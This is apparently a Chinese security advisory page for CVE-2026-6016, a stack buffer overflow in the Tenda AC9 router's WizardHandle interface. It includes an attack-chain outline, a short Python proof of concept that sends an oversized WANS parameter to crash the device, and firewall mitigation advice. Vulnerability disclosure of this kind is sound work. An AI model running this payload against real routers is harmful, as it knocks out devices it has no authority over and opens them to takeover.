IPBUF安全漏洞报告
English
CVE-2026-6016 CVSS 8.8 高危

CVE-2026-6016 Tenda AC9 栈溢出漏洞

披露日期: 2026-04-10

漏洞信息

漏洞编号
CVE-2026-6016
漏洞类型
栈缓冲区溢出
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Tenda AC9

相关标签

Buffer OverflowTendaRCEIoTRouter

漏洞概述

Tenda AC9路由器固件版本15.03.02.13中存在严重安全漏洞。该漏洞位于/goform/WizardHandle接口的decodePwd函数中,由于对WANS参数处理不当,导致栈缓冲区溢出。攻击者无需用户交互,仅需低权限即可通过网络远程发起攻击,成功利用可导致设备崩溃或执行任意代码,严重影响设备机密性、完整性和可用性。

技术细节

该漏洞源于Tenda AC9路由器固件在处理特定HTTP POST请求时存在严重的输入验证缺陷。漏洞点位于/goform/WizardHandle接口下的decodePwd函数。在处理用户提交的表单数据时,程序直接调用了不安全的字符串拷贝函数(如strcpy),将“WANS”参数的值复制到栈上的局部变量缓冲区。由于代码未对输入字符串的长度进行校验,当攻击者发送超长的“WANS”参数值时,数据将溢出缓冲区边界。这种栈溢出允许攻击者覆盖栈帧中的返回地址。一旦控制流被劫持,攻击者可以跳转到预设的ROP链或Shellcode。鉴于Web服务通常以高权限运行,成功利用此漏洞可导致拒绝服务或远程代码执行,使攻击者完全接管路由器。

攻击链分析

STEP 1
侦察
攻击者扫描网络,识别暴露的Tenda AC9路由器及其固件版本。
STEP 2
访问接口
攻击者向目标路由器的/goform/WizardHandle端点发送HTTP POST请求。
STEP 3
触发溢出
在POST请求中注入超长的'WANS'参数数据,超decodePwd函数栈缓冲区容量。
STEP 4
执行代码
覆盖返回地址,劫持控制流,在设备上执行恶意代码或导致系统崩溃。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL configuration target_ip = "192.168.0.1" target_url = f"http://{target_ip}/goform/WizardHandle" # Constructing the malicious payload # The vulnerability is triggered by a long 'WANS' parameter # Buffer size is limited, sending excessive data causes the overflow buffer_size = 1000 payload = "A" * buffer_size # Data to be sent in the POST request post_data = { "WANS": payload } try: print(f"Sending exploit payload to {target_url}...") response = requests.post(target_url, data=post_data, timeout=5) # Check if the target responds (often crashes or hangs on successful overflow) if response.status_code == 200: print("Request sent, check device for crash or shell.") else: print(f"Received status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"Connection error (device may have crashed): {e}")

影响范围

Tenda AC9 15.03.02.13

防御指南

临时缓解措施
如果无法立即升级固件,建议将路由器管理界面仅限制在内网访问,并配置防火墙规则禁止外部IP对路由器管理端口的访问。同时,应确保管理员密码足够复杂,防止低权限账户被轻易利用以触发漏洞。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表